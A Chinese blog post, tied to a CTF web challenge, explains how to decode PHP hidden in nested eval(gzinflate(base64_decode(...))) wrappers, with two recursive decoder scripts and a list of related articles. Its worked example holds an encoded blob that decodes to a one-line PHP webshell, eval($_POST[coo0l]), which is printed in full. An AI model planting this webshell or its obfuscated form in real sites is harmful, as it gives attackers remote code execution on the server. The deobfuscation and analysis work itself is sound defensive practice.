关于eval gzinflate base64_decode的解密方法

最新推荐文章于 2023-10-18 18:01:37 发布
原创 最新推荐文章于 2023-10-18 18:01:37 发布 · 3.8k 阅读 · 3 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。

本文详细介绍了如何解密被eval, gzinflate 和 base64_encode 方法加密的PHP代码。通过修改eval为echo,并使用递归函数,可以逐步解码并显示原始PHP代码,适用于网络安全和代码逆向工程。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

 

源代码

<?php
eval(gzinflate(base64_decode('加密部分 ')));
?>

只需要把eval 改成echo即可输出明文内容

相关题目:https://cgctf.nuptsast.com/challenges#Web        的PHP encode

 

如果改为echo还是类似的内容可以使用以下的的解密方法:

解法1:

<?php

//已经加密的文件内容
$a = "eval(gzinflate(base64_decode('这里面放BASE64代码')));";
function decodephp($a)
{
    $max_level = 300; //最大层数
    for ($i = 0; $i < $max_level; $i++) {
        ob_start();
        eval(str_replace('eval', 'echo', $a));
        $a = ob_get_clean();
        if (strpos($a, 'eval(gzinflate(base64_decode') === false) {
            return $a;
        }
    }
}

echo decodephp($a);
?>

解法2:

<?php

$a = file_get_contents("加密.php"); //含有eval语句的文本文件
//将有eval(gzinflate(base64_decode的加密文件只留eval(gzinflate(base64_decode('...');"语句
//其他诸如"<?"等信息都去掉并保存文件为"加密.php"
while (strstr($a, "eval")) {
    ob_start();
    eval(str_replace("eval", "echo", $a));
    $a = ob_get_contents();
}
echo $a;
?>

 

例子:

下面这个例子用echo也无法解密,但是可以用上面的2个方法

<?php
echo(gzinflate(base64_decode('DdS3EqNWAEDRfn/Eu0NBTmOPd8hCpEcWNB7CAyRA5Pj13u42p72///3n99iMP37APet+1vf7W3XZCn/m2QIZ6r8SFkMJf/4ll96jnWxdUGSvipB2wnTz8xBSECiRrp8C1DlCud/NqVu1lcEKLGq1V+jN3hxKkTvHZ6uSVWv0zUV0hZ1f9a9xJPwBpYbrQc0Xw5YJAUra6iKodOSy5tPe7Gt7fRLuqRnu0IO7HmRrVD1fxFeK2f2O1fv5wqik6ci0XuSjF4Swsih9w1QiGhdHod7s1r9EhnivBnLsmn4xa4lbDA6WrAPtdbdEHOZswZhkFO3s0/HloCA9DY8P4+bJkXLIdchUxFHPTxKZWt+WnWmGLXhiQHN3qm0Q6VnoO3vY/ckHsWOIGlV8XMV+UaZEcKBPsZgj+S7kKISh2ZQiNnVK4zlHRIt6B3jDl1Q4+e1dy5ZqmXb73JPXtWn+17i/hvBQFlEdrFopoTeovgwy5WxlIZVZNEnYBYkG6g9OQrBgxMC7yVs6jwjMpoeCIIio/dFLm3cHTaA141F+CvRT0swD9PPbqdBl3Hyo7kclQMFmTIumUi3tyVEMWI6S7DE3Ycn148vqQGTmZJx9OU5gjQg5gjN2jZ1QDgALD40TJJQQGj9S4JXm6GlyYW3wDViCyCEpeB4wiJWX8za3/WYMePG2i03eKDCHrtUlY1qsOEje1ZNI0Vys8DHUy5iAW/yVvs+mESrbTA9BLQtsI52NNSsmEQ5J8FHadb0gFXiQsWTHoOfByWnW9zaJz/uTND4Mts76xBqIVB48F1l7rvf50Dg+XBai/DzNS40ITBXbsJxjsOjqWKN9/piDp6nOSUu+0qwz8KM4ibR1MLL6TpK4PKjNd+0IWZE/8R3myU3TJ+X3/ZiO1ewlH/p8PBoGh6C+71RfrG7Ir7kSri3QDmWGZ+v3rIjfsIqVqCfPGwZPxV6+CoRE60eY1DhE57EGl77cJtPd7aKbY44XEjjTsqZGpaYLy4VEWORuuCAcYz0TTtc8Ui7UpgaqpU7NSSi4r7wnLLHlmXA8tbSA+9CZvhz77ZWq7A37rvoMFytqNlzcb6NQnEu/wzMusfJBn68TzeTtcpGEdujKeOnrFngtW8RO7VTMIm5evd80RnEQ0+O78O+JYEMd5a9stxWXWxWJaKV6qiTPYXxFV/rdUhFGQmb+jbmHML4fHF/tLILuYKYRNEHr6q9fv379/eP3nxn9Dw==')));
?>

输出的结果为

<?php eval($_POST[coo0l]);?>

参考资料:https://www.yziw.net/archives/1643.html

                   https://www.waitalone.cn/eval-gzinflate-base64_decode-decryption.html

 

 

Cyberchef实战之-Webshell绕过还原揭秘之-base64编码和压缩编码
村中少年的专栏
04-29 1631
介绍解析webshell常见的绕过手段,通过解析多层base64,压缩绕过的手段,扫清安全分析人员在日常的网络安全运营,护网,HVV,重保的过程中的障碍
Cyberchef实战之-Webshell绕过还原揭秘之--base64/HEX/Reverse/Html/Inflate/Rot13
村中少年的专栏
05-02 1267
通过cyberchef分析一段使用了base64,hex,压缩,rot13,反转等多种方式的webshell样本,为网络安全运营的日常分析,提供参考思路
php批量解密hp在线,gzinflate base64_decode 在线解密
weixin_29146313的博客
04-06 1739
PHP gzinflate base64_decode 加密代码格式: PHP文件包含字符串 eval(gzinflate(base64_decode PHP gzinflate base64_decode 在线解密 例如我需要解密一个类似如下内容的PHP加密代码: eval(gzinflate(base64_decode(fVRtb9s2EP7sAfsPF0MopUSV5LVNh9hKU3RuV...
php gzinflate base64_decode 解密
10-28
php gzinflate base64_decode 解密 密码:caonima
PHP base64+gzinflate压缩编码和解码代码
10-30
base64+gzinflate压缩编码(加密)过的文件通常是以 <? eval(gzinflate(base64_decode( 为头的一个php文件。文中给出了编码和解码的代码。
eval(gzinflate(base64_decode( php代码解密方法
jqqjj的博客
04-27 3133
今天网站被人入侵了,一查已攻击都上传的文件内容,发现有 eval(gzinflate(base64_decode(‘XXXXXX’)));这类代码,自己就想查看代码执行了哪些操作。 首先去掉eval()函数,打印一下原始代码,结果发现还是类似这样的代码,原来这玩意不简单呀。 那么这些加密是怎么做到的。其实也没什么的,就是循环N次使用gzinflate压缩代码而已,我们需要通过代码再循环反解出来即可。 #解密函数 function decode($str) { $maxTimes = 1000; //
php eval 在线解密,eval(gzinflate(base64_decode解密方法 | CN-SEC 中文网
weixin_35878683的博客
04-04 2802
今天群里一位朋友发了一个php的马子,经过了gzinflatebase64_decode加密,求解密,这种加密方法我以前也见过,只用把eval改为echo即可实现解密,但是情况并不是我想象的那么简单,输出的依然是乱码,网上找了一下终于找到了解决之道,分享给大家。PHP目前在网络中被用的越来越多,加密解密的话题也一直没有停息过。下面简单介绍一下base64_decode+gzinflate压缩编码...
eval(gzinflate(base64_decode N层,自动解密
weixin_34121304的博客
02-28 831
<?php header("Content-type: text/html; charset=utf-8"); $decode = 'DZdFEsRWEkT3vojt0EJMMeCQWsxMmwkxq8V0+ukb1K+f+TLrn//++5+5mf/4ozzT4a/6badqSPfyryzdSgL7X1Hm36L8608h6SRu80Te906gETRM5vErlgV8fjtq...
eval(gzinflate(base64_decode解密方法
weixin_50464560的博客
07-13 1877
今天群里一位朋友发了一个php的马子,经过了gzinflatebase64_decode加密,求解密,这种加密方法我以前也见过,只用把eval改为echo即可实现解密,但是情况并不是我想象的那么简单,输出的依然是乱码,网上找了一下终于找到了解决之道,分享给大家。 PHP目前在网络中被用的越来越多,加密解密的话题也一直没有停息过。下面简单介绍一下base64_decode+gzinflate压缩编码和解码代码方法,就是通常我们在程序中见的eval(gzinflate(base64_decode(‘加密代码’
php eval 在线加密,evalgzinflatebase64_decode三函数加密的代码在线解密
weixin_29724477的博客
03-17 933
&lt;?phpeval(gzinflate(base64_decode(&#039;DZW3roRaokQ/Z 7VDoDG62kCvPemgWSE9942X/9OXtGqparySod/6redqiE9yn ydC8J7H9Fmc9F c9/ MJB BOWmJ53cc9zOcp4tX5pkjFGldd4Syh6C5TLcmrf5Io4LzRdm8uZIYr0rtx3oScc7...
EVAL加密解密在线工具源代码
03-18
EVAL加密解密在线工具说明 1、本工具可以帮助我们为自己的网站JS及其他代码加密解密隐藏代码; 2、能够快速破解网站EVAL加密的脚本 3、可以辅助在自己的网站/博客作为一个款在线工具,方便自己以及方便其他需要的网友 使用方法: 本工具来自国外的一篇博文日
eval解密加密
08-26
eval解密加密 负责对javaScript的eval的加密和解密
EVAL加密解密在线工具 v1.0
10-28
EVAL加密解密在线工具说明 1、本工具可以帮助我们为自己的网站JS及其他代码加密解密隐藏代码;2、能够快速破解网站EVAL加密的脚本3、可以辅助在自己的网站/博客作为一个款在线工具,方便自己以及方便其他需要的网友 使用方法:本工具来自国外的一篇博文日志,然后笔者整理成工具分享,我们需要直接把解压之后放置在网站目录中,只需要空间支持HTML即可使用
php解密 eval( base64_decode,PHP之eval(gzinflate(base64_decode加密解密
weixin_39942992的博客
03-10 2294
从网上下载了个php版本的小游戏站的源码,一直都没有时间看,今天闲着没事看了下各个文件夹的内容,有一个文件引起了小胡的注意,文件名为php.php,打开之后发现了是加密过后的php文件,于是试着找了下相关的解密。按照eval(gzinflate(base64_decode解密方法,发现这是一个PHP的木马shell哦,还有解密之后看到了登陆的密码。于是打开phpstudy,进入这个php的木马,...
php解密 eval( base64_decode,base解密_php base64_decode解密
weixin_39777967的博客
03-10 2958
摘要 腾兴网为您分享:php base64_decode解密,银行帮,悟空单车,伪装定位,微商助手等软件知识,以及迷你盒子,固态硬盘优化软件,文华财经随身行,图片剪切工具,羊毛省钱,cygwin,极简名片,swf转avi,订货易,中国移动办公系统,发财猫,大地魂酒,比赛平台,锤锤小矮人,声之形等软件it资讯,欢迎关注腾兴网。eval base64_decode解密方法,在修改程序代码时,往往会碰...
php解密 eval( base64_decode,evalgzinflatebase64_decode三函数加密的代码在线解密
weixin_39800875的博客
03-10 645
&lt;?phpeval(gzinflate(base64_decode(&#039;DZW3roRaokQ/Z 7VDoDG62kCvPemgWSE9942X/9OXtGqparySod/6redqiE9yn ydC8J7H9Fmc9F c9/ MJB BOWmJ53cc9zOcp4tX5pkjFGldd4Syh6C5TLcmrf5Io4LzRdm8uZIYr0rtx3oScc7...
base64_encode()和base64_decode(),URL的加密解密详解
热门推荐
wangxuanyang_zer的博客
10-18 1万+
和是两个 PHP 函数,用于将数据在二进制和文本之间进行相互转换,而不是用于加密和解密。它们的主要目的是将二进制数据转换为文本格式,以便在文本传输中安全地传递二进制数据,例如在 URL 中传递参数、在 XML 或 JSON 中嵌入二进制数据,或在电子邮件中传输二进制附件。函数将二进制数据编码为Base64格式。2.它接受一个包含二进制数据的字符串作为输入,并返回一个Base64编码的字符串。
base64加密PHP脚本的解码方法
Simon
02-03 3104
PHP是网站服务端最流行的编程语言之一。PHP运行环境本身是开源的,服务器不加载插件时PHP脚本也无法加密。但是,总有人因为商业上的考虑,而将PHP程序通过各种方法进行混淆,使读者很难看到清晰易懂的代码。 然而,PHP运行环境的本质决定了,被混淆、编码的PHP脚本总是有办法恢复成可读的代码的。本文介绍了一种对含有evalbase64_decode的、被加密的PHP的解码方法。 在使用
eval(gzuncompress(base64_decode解密算法
最新发布
02-27
### 关于 `eval`、`gzuncompress` 及 `base64_decode` 的解密算法及其安全性 #### 使用场景与功能描述 `eval()` 是一种危险的功能,在 PHP 中用于执行字符串作为代码[^2]。这使得任何能够控制传递给 `eval()` 参数的人都可以执行任意代码。 `gzuncompress()` 函数用来解压缩由 `gzcompress()`, `gzdeflate()` 或者 `gzencode()` 创建的数据流。此函数返回解压后的数据,如果失败则返回 `FALSE`。 `base64_decode()` 将使用 MIME 基础 64 编码的数据转换回原始数据。该函数尝试解码并返回所提供的 data 字符串;如果没有成功,则返回 `false`。 #### 示例代码展示 下面是一个简单的例子来说明如何组合这三个函数: ```php <?php $encodedData = '7XzBwcHBQ0JCRUVGRkdISUpLTVlNT1BRUlNUV1dYWFlaWVFRUVFQUFBTUFJTUkxMTExMTEwMDAwMDBhYmNjZGVmZ2hpamtsbW5vcHFyc3R1dnd4eXp8fHx+fiv//'; // 已经被 base64_encode, gzcompress 处理过的字符串 $decodedBase64 = base64_decode($encodedData); // 首先进行 Base64 解码 $decompressedGzip = @gzuncompress($decodedBase64); // 接着解除 gzip 压缩 if ($decompressedGzip !== false) { $result = eval('return (' . $decompressedGzip . ');'); // 执行最终得到的 PHP 代码片段,并获取其返回值 } else { echo "Decompression failed."; } ?> ``` 需要注意的是上述示例仅作教学用途,请勿在生产环境中随意运行未经验证或不可信源提供的编码/加密内容。 #### 安全性考量 利用这些函数处理来自外部输入的内容是非常不安全的做法,因为攻击者可能注入恶意脚本并通过这种方式获得服务器上的权限。为了提高应用程序的安全性,建议遵循以下最佳实践: - **避免不必要的复杂度**:尽可能简化逻辑流程,减少潜在漏洞点。 - **严格过滤用户输入**:对于所有形式的动态参数都要实施严格的白名单机制。 - **禁用危险特性**:除非绝对必要,否则应关闭如 `allow_url_include` 这样的配置项以防止远程文件包含风险。 - **定期审查依赖库版本**:确保使用的第三方组件都是最新稳定版,并及时修补已知缺陷。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值